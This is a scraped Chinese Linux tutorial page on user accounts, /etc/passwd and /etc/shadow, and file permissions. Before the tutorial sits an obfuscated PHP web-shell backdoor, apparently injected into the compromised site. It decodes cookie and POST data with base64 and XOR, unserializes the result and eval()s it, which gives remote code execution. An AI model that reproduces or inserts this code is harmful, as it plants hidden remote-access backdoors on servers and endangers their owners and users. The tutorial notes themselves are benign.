$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 2016/08/03:用户管理与权限 | Linux运维部落

2016/08/03:用户管理与权限

名称解析:User IDentifier UID

组名:Group IDentifier GID

                                                        /etc/passwd:

  MD5:信息摘要  128bit定长输出16个字符

      SHA1:安全的哈希算法 160bit 

       密码数据库:/etc/shadow

                  6 sha512

12.png

组:用户容器,角色

   /etc/group

组密码:/etc/gshadow

 安全上下文:

   运行中的进程有其属主和属组:取决于进程的属组和属主

创建用户:

    useradd UserName

    生成的属性信息

    /etc/passwd:

    用户名:密码占位符:UID:GUID(基本组ID):用户备注信息(多个以,隔开):家目录:默认shell

    /etc/shells:当前系统的安全shell列表

    /etc/shadow

 13.png

useradd:adduser

   -u UID:指定UID

   -g GID:指定GID,即用户的基本组,但GID要事先存在

   -G GID:指定用户的额外组,但GID要事先存在

   -d 目录: 指定家目录

   -c 备注:备注

   -s:shell:指定默认shell,应该指定使用/etc/shells文件中出现的shell

   -m:创建用户时,强制给用户创建家目录

   -M:创建用户时,但不创建家目录

   -D: 改变其默认shell 

   -r: 创建系统用户 特点:id 1-499 不会为用户创建家目录 默认shell为/sbin/nologin

   id Username :显示用户的id号,组号

userdel:删除用户,默认会保留家目录

     userdel UserName

     -r:一并删除家目录 

groupadd GrpName 

   -g GID:创建组并为其指定GID

/etc/passwd:

/etc/group:

 组名:密码占位符:GID:用户列表(附加组)

 /etc/skel 默认复制文件地址

 /etc/defauit/useradd:配置文件

    

用户类别:

    管理员:0

    普通用户:centos 6 500+ 7 1000+

        系统用户:6:1-499   7 1-1000

登陆用户:500+

用户组:

   管理员组:

   普通组:

   以用户为视角,组可以分为两类:

      基本组:显示在/etc/passwd中GID字

      附加组:/etc/group

设定用户密码:passwd

     普通用户:passwd

     管理员:

        改自己密码:passwd

改其他用户密码:passwd UserName

         -l:锁用户 用户密码前加两个!

-u:解锁

密码安全性策略:足够复杂

   够长、交叉应用数字、大写字母、小写字母和特殊字符中的至少三种

   尽量避免使用易猜测的密码:

   定期更换:

/etc/shadow文件格式:

   登陆名:加密密码:最近一次的密码修改时间(距离1970-1-1的时间):最短使用期限:最长使用期限:警告区间:非活动区间(登陆就要修改密码):账号的过期期限:预留段

设定组密码:gpasswd GroupName

修改用户的属性定义:

    chsh:修改默认的shell

    chfn:修改用户注释

    usermod:跟useradd命令使用方法类似

         -u UID:

-g GID:

         -G GID:默认会覆盖原有的附加组,如果要是添加,可以同时使用-a选项

         -c string

-d new home 默认不会迁移用户的家目录,如果要迁移,同时使用-m选项

-s SHELL:

-l New_login_name:修改用户登录名称

-e 过期期限

-f 密码过期后多少天会停用

-L:锁定用户账号,不能登录

-U:解锁

如何修改组属性定义:

   groupmod:

        -g GID

-n New Group 修改用户的属组

   groupdel

   gpasswd

    -a user grpname 增加用户到指定组中

    -d user grpname 删除组中的用户

    

修改账号日期属性:

 chage:修改用户的日期属性

  -E:距离1970-1-1号的时间天数,过了这个时间,账号不可访问

  -I: 设置活动天数

  -m:修改密码最小使用时间

  -M:修改密码最长使用时间

  -W:警告时间

  查看用户的相关信息:

     id

       -n 显示名称

       -u 显示UID

       -g:显示基本组ID

       -G:显示所有组ID

     who 显示当前登录用户

     whoami:显示当前终端登录的用户

     su:Switch User

       切换用户

         -l:登陆式切换

-c:不切换用户,直接执行命令

权限管理:

   owner,group,other

   属主,属组,其他

   权限:read write execute

          r   w    x

    文件:

      r:可以使用内容查看类的命令来显示其相关内容

      w: 可以使用编辑器修改其内容

      x:可以将其发起一个进程

     目录:

      r:可以使用ls命令查看目录内容的文件信息

      w:可以创建、删除文件

      x:可以使用ls -l命令来查看目录内容的文件信息,并且可以使用cd命令切换此目录为工作目录:

      用户的不拥有某位权限,则使用-占位

      r-x:读和执行的权限

      r–:只读权限

      rw-:读写权限

      使用8位数来表示

      r:4

      w:2

      x:1

       保存到元数据的属性中的

修改文件的属主和属组 :仅管理员可执行,chown,chgrp

格式:chown [options] UserName[{:|.}GroupName] FILE…

修改文件权限:chmod

格式:

  操作三类用户的权限:使用8进制形式

      chmod [-R] OCTAL-MODE(8进制)file …

      对链接文件无效,左侧以0补齐

  操作指定类别用户的权限:使用u,g,o,a来赋权,基于=或者+/—来进行

     u:属主

     g:属组

     o:其他

     a:所有

     =:操作指定类型用户的权限

     +/—:操作置顶类型用户的单个权限

  参照其他文件的权限为当前文件来赋权

     chmod –reference=参照文件名 文件名

   umask

     创建文件:666-umask

            文件默认决不允许出现执行权限:

     创建目录:777-umask

     root:022

     如果用户名和基本组名一致:002,否则为022

FACL:访问控制列表

权限应用模型:

    进程的属主,是否与文件的属主相同,如果相同,进程则以文件属主的权限来访问文件:否则

    进程的属主所属的组,是否其中之一与文件的属性相同:如果相同,进程则以文件属组的权限来访问文件:否则

    进程则以文件的其他用户的权限来访问文件

 

原创文章,作者:000,如若转载,请注明出处:http://www.178linux.com/28949

(0)
上一篇 2016-08-05 16:13
下一篇 2016-08-05 16:13

相关推荐

  • 马哥教育网络班20期+第8周博客作业

    1、请描述网桥、集线器、二层交换机、三层交换机、路由器的功能、使用场景与区别。   网桥:链接层设备,基于MAC地址过滤。   集线器:物理层设备,基本都属于半双工模式。集线器与网桥在现在的局域网中基本都不用了。   二层交换机:基本MAC转发数据,功能齐全的可支持VLAN等功能。常见的有100/1…

    学员作品 2016-09-10
  • vim文本处理工具

    vim编辑器     1、文本的编辑器的种类:         行编辑器:所谓的行编辑器是指一行一行来编辑处理的工具,如sed         全屏编辑器:编辑空间占据整个屏幕,如…

    学员作品 2016-08-10
  • 马哥教育网络班20期 第10周课程练习

    1、请详细描述CentOS系统的启动流程(详细到每个过程系统做了哪些事情) 简述: 第一阶段:BIOS启动引导阶段;                     &…

    学员作品 2016-08-22
  • Linux学习总结及练习&day08-sed文本处理工具

    第一部分、Linux文本处理三剑客之sed(Stream EDitor)文本编辑工具     一、sed的基本功能工作原理     sed是一种流编辑器,它一次处理一行内容。处理时,把当前处理的行存储在临时缓冲区中,称为“模式空间”(pattern space),接着用sed命令…

    Linux干货 2016-08-10
  • 文本处理工具笔记

    1.文件查看相关命令      (1)cat命令      cat [OPTION]… [FILE]…      -E:显示行结束符      -n:对显示除的每一行进行编号 …

    学员作品 2016-08-10
  • linux中用ACL实现灵活的权限管理

    ACL是什么?? ACL英文原意是Access Control List(访问控制列表).它能够实现灵活的权限管理,除了文件的所有者,所属组和其他人,设置相应的权限外,ACL允许你给任何用户或是用户组设置任何文件/目录的访问权限(注意的是有些不支持数字模式的权限给定) ACL有什么用?? 作为UGO权限管理的补充,acl有GUO办不到或者是难以办到的功能 &…

    Linux干货 2016-08-05

评论列表(1条)

  • 马哥教育
    马哥教育 2016-08-07 22:15

    文章对用户常用管理命令及选项有了完整的归纳,如果能加上suid、sgid、sticky等特殊权限的介绍及应用场景模拟就好了,这里是需要该改进的。